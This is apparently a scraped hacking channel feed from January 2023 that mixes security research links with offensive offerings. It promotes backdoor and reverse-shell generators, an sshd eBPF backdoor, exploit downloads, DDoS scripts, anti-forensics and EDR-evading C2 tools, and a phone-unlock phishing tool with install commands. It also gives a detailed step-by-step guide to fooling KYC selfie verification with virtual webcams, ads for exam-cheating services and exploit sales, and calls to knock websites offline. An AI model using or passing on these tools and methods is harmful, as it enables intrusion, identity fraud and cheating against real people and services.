2023-01-30 16:59:32
OSINT tool to investigate GitHub profiles your WhatsApp messages on Telegram Windows x86 API hooking and modification directory and files from cli to ios and android devices without need of an extra clien app
2023-01-30 16:59:31
 CVE-2023-23560 flaw exposes 100 Lexmark printer models to hack
2023-01-30 09:47:36
hackebds(2023.1.29 0.3.3)Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal,Pure static backdoor .Armv5, Armv7, Armv8, mipsel, mips,mips64,mipsel64,powerpc, powerpc64,sparc,sparc64 are now supported, and they are still being updated (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be generated on the target machine)Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated|Generate bind of various architectures bind_Shell file.Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fastDownload:
2023-01-30 09:39:12
MYBB_1.8.32_LFI_RCEMyBB 1.8.32 – Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script…Download:
2023-01-30 09:32:05
2023-01-30 09:31:49
2023-01-29 17:22:07
⚙️ Complete Bug Bounty tool List ⚙️Enjoy :)dnscan https://nmap.orgMasscan Machine https://web.archive.orgwaybackurls Sn1per Apktool Injector JSON Web Token Toolkit the Web Tools @freehackingresources
2023-01-29 17:17:00
GHunt (v2) is Google's offensive framework designed for efficient development. It is currently focused on OSINT, but any Google-related usage is possible..♾♾
2023-01-29 12:18:56
2023-01-29 11:56:55
Exploit for full access to disk C:\  (for all users)Download:
2023-01-29 10:39:34
Bugbounty Notes 📒Inclue OWASP Top 10 And more#bugbounty #InfsoecAmazing Git Repo : This Out 👌
2023-01-29 08:37:29
2023-01-29 05:47:41
2023-01-29 01:43:39
Rust PDF builderIt includes these premade templates:- adobeacrobate- dropbox- googledrive- office365- onedriveCustom Templates (Own PDF files) will also work.Usage: rust-pdf-creator.exe <input_url> <template/file/list>Example: rust-pdf-creator.exe onedrive. Download:
2023-01-28 13:50:01
2023-01-28 12:36:22
KillMyOTAOTA Killer for iOS 15.0 - 16.1.2Download:-
2023-01-28 12:35:06
#DDoS Scripts and MethodsL7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.Note: Scripts written in 'C' need to be compiled with GCC compiler, first.
2023-01-28 12:33:17
sshd_backdoorAbout Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.Main Process in ebpf program:Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.Download Link:
2023-01-28 12:29:19
2023-01-28 11:30:45
2023-01-28 05:18:17
gg's hacker's ( have a good day —❤️ ‼️Here we go again Get a (.in) Free Domain for 1 Year! Offer valid from 26-30th January 2023. condition is youw ill get 1 Domain for Free.Website #hacker_bano_chutiya_nhe 🌜👾🌛
2023-01-28 02:11:30 join this channel for more updates .........
2023-01-28 02:10:59
Sourcecode & Sensitive Leaks.NTDC Tripping Server.
2023-01-27 14:44:02
Dear all user's i am deleting this id sorry and wait @hayper007. I am coming with new account Don't sand msg 2hrsRe promot me 😂
2023-01-27 14:02:59
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: @examsolutionzWe have added new exam of burpsuite solutions
2023-01-27 09:08:56
2023-01-27 09:08:55
2023-01-27 07:11:23
#Red_Team_Tactics1. Proxying DLL Loads For Hiding ETWTI Stack Tracing Python module for running BOFs
2023-01-27 07:11:22
#Sec_code_reviewStatistical Analysis to Detect Uncommon Code
2023-01-27 06:24:41
Whacking a phishing admin panel for fun and profit January 26, 2023 at 10:32AM by thehunter699via reddit
2023-01-27 06:23:37
Gank-RECONSubdomains enumeration, various scans and testing of some vulnerabilities.
2023-01-27 06:20:27
OpenCVeOpenCVE is a platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE...).Users subscribe to vendors or products, and OpenCVE alerts them when a new CVE is created or when an update is done in an existing CVE.
2023-01-26 13:57:41
#Malware_analysis"Fighting to LODEINFO: Investigation for Continuous Cyberespionage Based on Open Source", 2023.]-> LODEINFO Triage Tools:
2023-01-26 13:57:40
#exploit1. CVE-2022-38181:Vulnerability in the Arm Mali GPU CVE-2023-0210:Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
2023-01-26 13:57:39
#Threat_Research#Blue_Team_Techniques1. At the Edge of Tier Zero: The Curious Case of the RODC Sigma Rule to Detect Uncommon Keyboard Layout Loads]-> Sysmon Config:
2023-01-26 12:19:51
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️#GiveawayOnRepublicDayTryHackMe 1 Month 3 Vouchers Giveaway...If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe IDWe'll review your TryHackMe account and based on your progress we will try to ask some basic questions...After that you will be given your TryHackMe Coupon...Dm :- @lexlegion☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
2023-01-26 09:59:28
2023-01-26 06:13:37
Pakistan, Papa logo Ko happy republic day bolo.
2023-01-26 02:17:44
Gantantra diwas ki hardik shubhkamnaye ❤️
2023-01-25 20:50:10
2023-01-25 17:44:03
Mullvad VPN Key  7689329868339684 42284748319087392678008071148699 6390042299824693 All key valid for 14 daysEnjoy all 😂
2023-01-25 13:20:43
2023-01-25 11:49:25
Ever wanted to get payload from packed android malware without running android emulator/device? kavanoz make this!
2023-01-25 08:30:27
🔰 NEW TOOL FOR PHONE UNLOCK PATTERNS AND PINS 🔰Ⓜ️REQUIREMENTS :Internet : 50 MBphpStorage : 50 MBngrok Features :[+] Real pattern hacking ![+] Updated maintainence ![+] Ngrok link[+] Easy for Beginners !INSTALLATION [Termux] :$ apt-get update -y$ apt-get upgrade -y$ pkg install python -y$ pkg install python2 -y$ pkg install git -y$ pip install lolcat$ git clone$ cd $HOME$ ls$ cd hacklock$ ls$ bash setup$ bash[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...[+]--You will recieve patter pin in below image you can see pattern with numbers[+]--You can select any option by clicking on your keyboard[+]--Note:- Don't delete any of the scripts included in core〰〰〰〰〰〰〰〰〰〰〰〰〰
2023-01-25 06:46:01
#hardeningA tool for checking the security hardening options of the Linux kernel
2023-01-25 06:46:00
#Red_Team_Tactics1. Elevation of Privilege from Local Admin to gMSA Keeping LSA secrets out of physical memory Basic SSTI - Server-Side Template Injection (2023)
2023-01-25 03:13:25
2023-01-25 02:35:45
Internet Camera Exploitation ToolThis is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.ioI was able to discover thousands of vulnerable cameras using itTool:-
2023-01-25 02:33:44
WordPress Plugin Elementor 3.6.2 – Remote Code Execution (RCE) (Authenticated)] Date: 04/16/2022Exploit:-
2023-01-24 13:44:38
#Research"StealthyIMU: Stealing Permission-protected Private Information From Smartphone Voice Assistant Using Zero-Permission Sensors", NDSS 2023.]-> Repo:
2023-01-24 13:44:37
#exploit1. A Step-By-Step Introduction To The Use Of ROP Gadgets To Bypass DEP b3typer - Simple typer bug CVE-2022-2347:U-Boot - Unchecked Download Size/Direction in USB DFU
2023-01-24 13:44:36
#Malware_analysis1. Analyzing Malicious OneNote Documents Roaming Mantis implements new DNS changer in its malicious mobile app in 2022
2023-01-24 08:17:35
A #browser_extension for OSINT search all-in-one Red Team #extension for Web Pentest
2023-01-24 07:19:05
Bug : Facebook Group Members DisclosureIntro : A Non-member can determine if someone is the member of a private group or not via CometHovercardQueryRendererQuery graphQL mutation.Video POC:-
2023-01-24 03:29:55
Java XML security issues and how to address them
2023-01-23 17:54:51
2023-01-23 16:17:49
#DFIRShareFinder: How Threat Actors Discover File Shares
2023-01-23 16:17:48
#Threat_ResearchTraffic signals: The VASTFLUX Takedown
2023-01-23 16:17:47
#AnalyticsCybersecurity Trends Q1/23:⬆️ Pwd spraying/creds stuffing; ⬆️ Phishing w/ new file types, eg .one, .iso, .lnk;⬆️ Rust malware / loaders (+Go +Nim +Zig);⬆️ Sliver implants; ⬆️ Abused legit RA software;⬆️ Abused legit encryption tools (ransom);⬆️ Token/Cloud API abuse;⬇️ Malware attacks on non-standard ports;⬇️ E-Skimming Incidents;⬇️ Office Macros.
2023-01-23 16:17:46
#Offensive_security1. Cobalt Strike Beacon Object File for kernel exploitation using AMD's Ryzen Master Driver (version 17) A script to automate privilege escalation with CVE-2023-22809 vulnerability
2023-01-23 15:47:01
SQLi Hunter v2 is a python program that checks for SQL (and Blind) injection vulnerability in URL’s. The program is designed to be easy to use, practical and beneficial. The intention of this tool is to include it in your ethical Bug Bounty Hunting methodology. Please do not use this tool on any website without having its permission.
2023-01-23 15:40:32
PhoneSploit ProPhoneSploit with Metasploit Integration.An All-In-One hacking tool to remotely exploit Android devices using ADB and Metasploit-Framework to get a Meterpreter session.
2023-01-23 15:23:21
Echidna – A Fast Smart Contract FuzzerEchidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley)
2023-01-23 11:51:52
[META BUG BOUNTY 2023] - Video Poc
2023-01-23 11:43:26
CVE-2023-22809 – sudo Privilege escalationAffected sudo versions: 1.8.0 to 1.9.12p1This script automates the exploitation of the CVE-2023-22809 vulnerability to gain a root shell.Script:
2023-01-23 10:28:32
Solaris 10 LPE ExploitDownload:
2023-01-23 06:07:47
90% Pakistan is out of electricity after major cyber attack on electricity systems.बिजली प्रणालियों पर बड़े साइबर हमले के बाद 90% पाकिस्तान में बिजली गुल।
2023-01-23 00:05:53
Hi Techies, Ethical Hackers and Cyber security enthusiasts. I am offering a great opportunity to you all to work with us at Techofide.Here is the link to apply: for your responses everyone! Have a great day😀
2023-01-22 17:58:02
#toolsUtility to find hidden Linux kernel modules]-> LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64):
2023-01-22 17:58:01
#exploit1. CVE-2022-42864:Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition") CVE-2022-25637:Multiple TOCTOU vulns in peripheral devices (Razer, EVGA, MSI, AMI)
2023-01-22 15:38:13
2023-01-22 15:38:12
📚 ILLEGAL7 HACKERS ALL COURSES 📚Software cracking🟢Advanced software cracking 🟢Cracker Tools 2.8 🟢Dotnet Software Reverse Engineering And Static Analysis Course🟢Ransomware virus course 🟢Reverse Engineering Course🟢Software Cracking CourseSize : 6.11 GB⬇️Link :- : Theillegalhacker7@@@
2023-01-22 10:38:25
CVE-2023-0398 modoboa – mail ServerDescriptionGET /admin/domains/{id}/delete/ page is vulnerable to a CSRF attack.Exploit:
2023-01-22 10:11:29
Facebook 0-day Bug (account takeover) Still not patchedcheck out now :
2023-01-22 09:47:29
2023-01-22 05:54:36
2023-01-22 04:18:10
2023-01-22 02:23:55
2023-01-21 17:01:11
#UAV #UAS #UUV #forensics #security #vulnerabilities
2023-01-21 17:01:10
🕵️‍♂️Руководство по поиску в твиттере(расширенный вариант)🕵️‍♂️Twitter Search Guide (extended version)#osint #twitter‌‌Translation: ru-en🕵️‍♂️Twitter Search Guide (Advanced)🕵️‍♂️Twitter Search Guide (extended version)#osint #twitter‌‌
2023-01-21 13:25:49
2023-01-21 13:25:48
2023-01-21 13:20:36
Linux kernel stack buffer overflow in nftables(CVE-2023-0179)The vulnerability consists of a stack BOF due to an integer underflow vulnerability inside the nft_payload_copy_vlan function, which is invoked with nft_payload expressions as long as a VLAN tag is present in the current skb.⚠️The exploitation could allow the leakage of both stack and heap addresses and, potentially, a LPE to the root user via arbitrary code execution.Exploit:
2023-01-21 13:00:01
Get GPT like chatGPT on your terminal
2023-01-21 12:09:35
#Blue_Team_Techniques"Best Practices for MITRE ATT&CK Mapping", January 2023.
2023-01-21 12:09:34
#DFIRThe Key to Identify PsExec
2023-01-21 12:09:33
#tools#Cloud_Security1. Kubernetes exploitation tool Azure Attack Paths Management
2023-01-21 10:59:04
2023-01-21 03:08:26
2023-01-20 19:37:19
Поисковая система запустила чат-бота с искусственным интеллектом, под названием youChat 💻 Чат-бот способен отвечать на вопросы, и вести разговоры, на подобии с ботом ChatGPT, хотя и имеет значительно меньший функционал, относительно последнего. Разработчики заявляют, что добавление youChat значительно расширяет возможности поиска нужной информации в Интернете. Так, он в состоянии помочь с простыми ответами на общие вопросы, предложением идей, перевода, обобщении текста, составлении электронных писем, а также написании кода. Тем не менее система пока находится в бета-тестировании, и разработчики не рекомендуют принимать на веру все ответы, что выдаёт бот.
2023-01-20 19:25:04
#exploit1. CVE-2022-47966:RCE vulnerability in multiple ManageEngine (Apache Santuario (xmlsec) <=1.4.1) products]-> CVE-2022-39955:Charset confusion + WAF bypasses via 0days Microsoft Teams RCE
2023-01-20 13:25:05
Android Exploit to get a System based shell (UID 1000) on ANY Samsung Mobile Device based on CVE-2019-162531) Downgrade to vulnerable SamsungTTS app2) Install exploit APK3) Exploit vulnerability to achieve System rights
2023-01-20 12:50:43
🔥🔥🔥FoxitReader Precise Heap Spray 0c0c0c0c bc.⚠️Testesd version:
2023-01-20 12:26:49
Google Chrome “SymStealer” (CVE-2022-3656)
2023-01-20 12:19:21
2023-01-20 11:12:24
Centreon Map plugin allows pre-auth remote process memory dump (CVSS 8.3) - PoC January 19, 2023 at 12:33PM by qwerty0x41via reddit
2023-01-19 15:28:33
2023-01-19 15:09:30
2023-01-19 14:21:29
#exploit1. CVE-2023-0179:Linux kernel stack buffer overflow in nftables Security Audit of Git:CVE-2022-23521:Truncated Allocation Leading to Out of Bounds Write Via Large Number of AttributesCVE-2022-41903: Out of Bounds Memory Write in Log Formatting
2023-01-19 14:21:28
#tools#Blue_Team_Techniques1. MIMEDefang - e-mail filtering tool that works with the Sendmail "Milter" library Automated Penetration Testing Reporting System
2023-01-19 06:19:28
Some internal IPs from pak
2023-01-19 03:13:19
Learn SQLI In A Easy Way
2023-01-19 02:44:43
2023-01-18 08:01:43
2023-01-18 07:11:12
2023-01-17 18:09:35
After you have your TikTok account ready, open your selfie on you PC, make anew video on TikTok and select “Dynamic Photo” filter.After you selected your filter, point your camera to the selfie that's on you PC andyou will see that the selfie is moving, smiling, rotating their eyes, etc.Record a small video and upload it to TikTok (Make sure its public)After its uploaded, go to: (ticktock video downloader ) and paste your video link toDownload your video without the TikTok tag.After that its easy, go to OBS, under “Sources” select “Media” and select yourTikTok video that you just downloaded.My targeted website requires me to verify thru my phone.This part if you service only serve through AppsFor this, you would need a few tools:● LDplayer (Android Emulator)● Logitech capture softwareAfter you downloaded those 2 tools, create a new LDplayer android emulatorwindow and select 640x640 resolutionThen, open Logitech capture software, open you selfie/docs photo, selectresolution to 1080p and then in “Source 1” select your opened photo title. Thenhead to ManyCams, select camera source as “Logi Capture”.Then, head back to your android emulator, go do your kyc and when emulator askif you want to use webcam or screen crop, select webcam and you should seeyour uploaded photo right there, go on resize or change position of the photo ofyour needs and take the picture.Thats it! This should be enough to bypass a lot of kyc providers and will allow youto easily verify your account!Download links:OBS: capture:
2023-01-17 18:00:33
How To Bypass Selfie Verification❓Table of content● Know KYC Verification mechanism● How to fake live webcam● How to fake rotate head verification● How to make you selfie more alive● How to fake phone required kyc● ResourceOld Standart : Upload Document and Photo with Signature or Holding Written Name and service  on cardboard (example old binace if i remember correctly service before 2013 ?)ScanFace: Simple Request to scanning faceRotated head: Require you rotate you head folowing the circle Blink Life Test : Require you to blink follwong countdown orderID Card+Face Selfie + Mostly Populer among Indonesia Apps like E-wallet and exchangerFaking the WebcamMost of website this day enforce verification through selfie-life cam, site will ask you to allow turn on camera and record you face, which can have serios consequence if company you use are not good in keeping their data.There way to counter this defense  You need to download:● OBS (With virtual cam plugin)● ManyCams -- Not free please go to reddit piracy megathread to find safe and clean pirate versionSome of download links will be available at the last page of this thread.Install both of them and ready your docs.Now, open OBS and under “Sources” tab click on “+” and then “Image”Then, select your image path and press okay. You will see your selected image on OBS.Now, open ManyCams, go to “Text” tab and uncheck “Show ManyCams logo”Go back on OBS and click on “Start Virtual camera”Now, go back to your website that you try to verify and start the webcam verification, allowaccess and you should see your selected photo on the webpage.You can change the photo position (If you doing selfie verification, so the face would go into the“Head bubble”) on OBS by moving the picture or change the size of it by grabbing the corner ofthe photo. (Red line)"If your KYC puts you to fullscreen as soon as you start the verification and cancelsout if you exit the fullscreen, open OBS, then Start the verification and as soon asyou go to fullscreen, ALT+TAB to OBS window so the verification won't becancelled and you will be able to move your picture around.After that just size your picture to you needs and take the photo."This one of difficult partDamn, that was easy. But my verification requires me torotate my head.A lot of KYC requires you to do that. To bypass that, head to: and create an account there (It requires you to do aPost by @hayper007small donation to use their services, i highly advise you to do that as it will helpyou in your KYC bypass journey)After you successfully created your account and made a small donation, start anew project and then select “Image” and then “Add”.After that you will see your photo on the website, then you should see a smallmenu in the middle up, select “Mode to draw smooth shapes”.After you selected the correct mode, carefully draw a shape around your selfies head.After you did it, you should see your selected area lighter than the background.Post by @hayper007On the left side you will see a small box, select “Rotation mode” and slightly move your cursor in the box area to rotate the selected area.After you managed to make your selfie a 3D model, you can recordyour screen rotating your head and then in OBS under “Sources”tab selecting “Media source”Or, you could select “Window capture” and selecting the“Smoothie-3d” tab and rotating your head live when you doing yourKYC verification.Post by @hayper007Okay, but my selfie looks “Not real”, how do i make it morealive?Note: this part of method involving you using phone to create resource for part of method.Some of the HQ websites (Banks, main crypto exchange sites, etc) could see thatyour selfie is a plain photo as it doesn't have any “Liveliness” in it.To bypass that, you need 2 things.● TikTok account● Smartphone with working cameraIf you have that, go ahead and download TikTok and create an account.
2023-01-17 14:40:36
Post from @hayper007
2023-01-17 14:40:35
Post from @hayper007
2023-01-17 14:40:34
Post from @hayper007
2023-01-17 14:28:06
#Malware_analysis1. Analyzing Rhadamanthys Stealer BianLian Ransomware (Decrypted)
2023-01-17 14:27:36
Class Starting At 8:00 PmJoin Now Invite Link (Web) :
2023-01-17 14:18:22
#Hardware_SecurityHow Signal Works inside the Kernel
2023-01-17 14:18:21
#tools#Threat_Research1. Detection of Lateral Movement with the Sliver C2 Framework]-> Java code inspector for web vulnerability scan Survey of security mitigations and architectures, December 2022
2023-01-17 14:18:20
#exploit1. Redis 6.0.16 - RCE Linux kernel exploit development
2023-01-17 14:18:19
#tools#Red_Team_Tactics1. Forensia - Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase VirusTotalC2 - Abusing VirusTotal API to host C2 traffic
2023-01-17 11:53:20
Gmailc2A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections and Network Traffic Restrictions.C2 Feature:▫️ Persistence (type persist)▫️ Shell Access ▫️ System Info (type info)▫️ More Features Will Be AddedFeatures:▫️ FUD Ratio 0/40▫️ Bypass Any EDR's Solutions▫️ Bypass Any Network Restrictions▫️ Commands Are Being Sent in Base64 And Decoded on server side▫️ No More Tcp Shits
2023-01-17 09:30:32
ClassTopic: Sql injectionTime: 8 Pm ISTDetails: @vanshsecInvite Link (Web) : se Jayada Aaye Aur thodi Si Aur knowledge paye
2023-01-17 02:16:06
2023-01-17 02:15:46
2023-01-16 10:24:51
2023-01-16 10:00:27
ForensiaAnti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase.#Unloading Sysmon Driver.#Gutmann Method File Shredding.#USNJrnl Disabler.#Prefetch Disabler.#Log Eraser and Event log Disabler.#User Assist Update Time Disabler.#Access Time Disabler.#Clear Recent Items#Clear Shim Cache#Clear RecentFileCache#Clear ShellBag#File Melting Capabilities.
2023-01-16 07:59:31
2023-01-16 07:59:30
2023-01-15 16:02:45
2023-01-15 13:05:50
#Research"TROJANPUZZLE: Covertly Poisoning Code-Suggestion Models", 2023.
2023-01-15 13:05:49
#Malware_analysisHow to Analyze JavaScript Malware - A Case Study of Vjw0rm
2023-01-15 13:05:48
#exploit1. CVE-2022-28944/CVE-2022-24644:EMCO Software Multiple Products/KeyMouse 3.08 (Win) - Unauth. Update RCE Client-Side SSRF to Google Cloud Project Takeover [Google VRP] CVE-2022-3656:Symbolic Link Following + Upload Warning Bypass
2023-01-15 13:05:47
#Infographics#Malware_analysisAntivirus Event Analysis Cheat Sheet, ver. 1.11.0.]->
2023-01-15 13:05:46
#tools#Blue_Team_Techniques1. Detecting Fake Events in Azure Sign-in Logs Crassus - Windows privilege escalation discovery tool
2023-01-15 09:18:43
Cheatsheetsof knowledge about information security.
2023-01-15 05:01:28
Happy Indian Army Day 💖
2023-01-15 03:51:00
Love you india ❤️❤️
2023-01-15 00:13:40
PTorZillaPrint: Firefox & Tor Browser fingerprint testing.
2023-01-14 15:16:55
2023-01-14 13:01:33
CVE-2022-46169Exploit to CVE-2022-46169 vulnerability on Cacti 1.2.19
2023-01-14 12:56:58
Asta-decryptThis is a simple script that implements the decryption routine for the encrypted final stage used by the Astaroth/Guildma malware family.Astaroth uses an AutoIT script with an embedded DLL that writes the final payload to disk as db.temp and injects it into a hollow process.
2023-01-14 08:42:40
Happy Makar Sankranti to all of you❤️
2023-01-14 05:38:19
CVE-2023-21752PoC for arbitrary file delete vulnerability in Windows Backup service
2023-01-14 01:07:44
2023-01-14 00:40:47
​​SUDO_KILLERA tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation. #sudo
2023-01-13 20:37:47
Guys please support me
2023-01-13 13:55:41
#Whitepaper"EyeSpy - Iranian Spyware Delivered in VPN Installers", 2023.
2023-01-13 13:55:40
#Malware_analysis1. NeedleDropper Analysis Gootkit Loader "Pre-Owned" malware in ROM on T95 Android TV Box (AllWinner H616)
2023-01-13 13:55:39
#exploit1. PoC for arbitrary file delete/move in Razer Synapse 3 Macro module CVE-2023-21752:PoC for arbitrary file delete vulnerability in Windows Backup service
2023-01-13 09:59:33
2023-01-13 08:04:09
GraphQL exploitation – All you need to know – Cybervelia January 13, 2023 at 02:28AM by Necessary-Reality-80via reddit
2023-01-13 08:04:08
Linux sysadmins, beware!Hackers are exploiting a critical RCE vulnerability in Control Web Panel (CWP) to gain elevated privileges on web servers.Read: your servers ASAP!
2023-01-13 03:56:10
Happy Lohri to everyone
2023-01-12 18:33:56
If u want organic traffic for ur site to promote to eligible for adds ping me @alex14324 escrows welcome 😊
2023-01-12 17:20:05
#reversing#IoT_SecurityReversing embedded device bootloader (U-Boot)Part 1: 2:
2023-01-12 17:20:04
#tools#Malware_analysis#Blue_Team_TechniquesAutomating Malware Analysis Operations (MAOps)]-> Malware C2 Monitoring:]-> Malware Hunting using Cloud:]-> YARA CI/CD system:]-> Surface Analysis System on Cloud:]-> Memory Forensic on Cloud:
2023-01-12 17:20:03
#exploit1. CVE-2023-0210:Unauthenticated remote DOS in ksmbd NTLMv2 authentication (Linux kernel) CVE-2022-20452:Privilege escalation on Android from installed app to system/another app via LazyValue using Parcel after recycle()
2023-01-12 17:20:01
#Research"Apple vs. EMA: Electromagnetic Side Channel Attacks on Apple CoreCrypto", 2022.]-> A Potholing Tour in a SoC:An electromagnetic-wave side-channel issue on ARMv8 AES instructions:
2023-01-12 17:20:00
#Threat_ResearchOpen-source Cobalt Strike stager decoder]->
2023-01-12 17:19:59
#Offensive_security1. SMB "Access is denied" caused by anti-NTLM relay protection Implementation of Persistence via Recycle Bin by adding "open\command" subkey to the "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell" key and changing its value to the implant path Vulnerabilities on redirected•com
2023-01-12 14:39:37
Please like and support it guys…!
2023-01-12 10:54:48
Secret HandshakeA prototype malware C2 channel using x509 certificates over mTLSI always wondered if threat actors ever used x509 certificates as part of their C2 communication, not to encrypt the network traffic but to actually embed the C2 communication in the x509 cert. After searching for something like this in the wild for 5 years I finally decided to just code it myself to see if it's is
2023-01-12 05:51:59
SpyDialerFree search contact information by phone number, name, address or email.Even shows the names of the neighbors, but the information displayed by the service requires additional verification. #humint #usa
2023-01-12 05:32:34
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit
2023-01-11 15:31:49
📡Совсем скоро будет представлена эффективная и безопасная система система AARTOS DDS для обнаружения дронов, причем есть защита, которая подбирается индивидуально под заказчика. Сие чуда будет показано на выставке Perimeter Protection с 17 по 19 января 2023 года
2023-01-11 15:24:28
🕵️‍♂️StrongPity espionage campaign targeting Android usersESET researchers identified an active campaign that we have attributed to the StrongPity APT group. Active since November 2021, the campaign has distributed a malicious app through a website impersonating Shagle – a random-video-chat service that provides encrypted communications between strangers. Unlike the entirely web-based, genuine Shagle site that doesn’t offer an official mobile app to access its services, the copycat site only provides an Android app to download and no web-based streaming is possible.
2023-01-11 15:17:16
#Threat_Research1. RCE bug in JWT Secret Poisoning (CVE-2022-23529) Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security Navigating the Vast Ocean of Sandbox Evasions
2023-01-11 15:17:15
#Offensive_security1. Microsoft LAPS(E) in Judgement NonHeavyFTP:A FTP Server pwn chanllenge
2023-01-11 15:17:14
#Research"BlockScope: Detecting and Investigating Propagated Vulnerabilities in Forked Blockchain Projects", 2022.]->
2023-01-11 15:17:13
#exploit1. CVE-2022-31705:Geekpwn 2022 Vmware EHCI OOB Linux >=4.10: UAF in __do_semtimedop() due to lockless check outside RCU section Lexmark Printers/Copiers haxx 0-day Exploit
2023-01-11 15:17:12
#FuzzingFuzztruction - prototype of a fuzzer that does not directly mutate inputs but instead uses a so-called generator application to produce an input for our fuzzing target
2023-01-11 15:14:57
2023-01-11 15:14:56
2023-01-11 15:14:55
2023-01-11 08:59:41
2023-01-11 02:31:47
​​CVE-2022-39073Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit. #exploit
2023-01-11 02:31:46
ImageMagick Security Policy Evaluator January 10, 2023 at 04:52PM by nibblesecvia reddit
2023-01-10 18:17:45
2023-01-10 16:31:12
My old video 5 years back tracing ip address
2023-01-10 15:44:50
​​Программируемая Карточка NFC RFID4 930 рублей#Оборудование Translation: ru-enProgrammable NFC RFID Card4 930 rubles‌‌
2023-01-10 15:35:52
⚙️ New Update On AlienFox Ultimate 🦊
2023-01-10 15:30:02
2023-01-10 15:18:46
Geolocation Spy (GeoSpy) - is an OSINT analysis and research tool that is used to track and execute intelligent social engineering attacks in real time.▫️
2023-01-10 13:19:07
#exploitSSRF attack on MySQL Server with password using php-curl
2023-01-10 13:19:06
#Red_Team_Tactics1. Bypass EDR Hooks by patching NT API stub, and resolving SSNs and syscall instructions at runtime A new AMSI Bypass technique using .NET ALI Call Hooking Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID
2023-01-09 18:38:22
𝘾𝙍𝙔𝙋𝙏𝙊 𝙊𝙎𝙄𝙉𝙏:├BTC-ETH-XRP-BCH-LTC-XLM-DASH-ZEC-XMR-TON (Blockchain)├Google Dorks (Change Wallet)├blockchair (Explorer) + Chrome├breadcrumbs (Visualization) + Chrome├shard (Visualization)├blockpath (Visualization)├oxt (Visualization)├graphsense (Visualization)├ethtective (Visualization ETH)├walletexplorer (Grouping)├bitinfocharts (Grouping)├bitcoinabuse (Abuse)├bitcoinwhoswho (Abuse)├checkbitcoinaddress (Abuse)├scamalert (Abuse)├cryptscam (Abuse)├ransomwhe (Abuse)├badbitcoin (Abuse)├bitcoinais (Abuse)├cryptoblacklist (Abuse)├bitrankverified (Scoring)├vivigle (Scoring)├antinalysis (Scoring TOR)├cryptocurrencyalerting (Monitoring)├cryptotxalert (Monitoring)├kycp (Block Analysis)├blockstream (Block Analysis)├fragment (TON market)└btcrecover (Wallet Brute)
2023-01-09 17:41:18
Мы шикарны👄Неплохо поработали💯А свиньи как всегда идут ⚰🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️👍
2023-01-09 17:41:17
📌Добрый вечер, КиберАрмия⚔🇷🇺Пробуем положить усраинский свиносервис для поиска работы, призывающий создавать Call-центры для обзвонов Российских государственных учреждений в целях сообщения ложной информации об их минировании!URL:❓IP:❓Начинаем⚠️
2023-01-09 17:34:11
2023-01-09 16:40:34
Сайт пункта подвергся киберсокрушению😏👍‌‌Translation: ru-enThe site of the point was cyber-crashed😏👍‌‌
2023-01-09 11:37:43
2023-01-08 15:48:10
Wordpress exploit come with your price @alex14324
2023-01-08 13:03:13
2023-01-08 10:11:11
Leaked FBI Operating System that is used by a certain division known as the Computer Analysis Response Team (CART)
2023-01-08 03:56:02
2023-01-07 16:38:12 IS BACK :)❤️
2023-01-07 15:06:59
#tools#Offensive_security1. Alcatraz - x64 binary obfuscator Phantom DLL Hollower
2023-01-07 15:04:22
💥Phantom DLL Hollower is a PoC performs Phantom DLL Hollowing which reported by @_forrestorr.🔖Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing⚙️Phantom DLL hollowing PoC
2023-01-07 14:06:21
2023-01-06 19:38:50
Let me know if anybody interested to purchase price is nogetiable Dm @alex14324
2023-01-06 16:43:11
Cyber Security Attack Vectors👁 #Attack
2023-01-06 16:16:10
#Research"From IP to Transport and Beyond: Cross-Layer Attacks Against Applications", 2022.
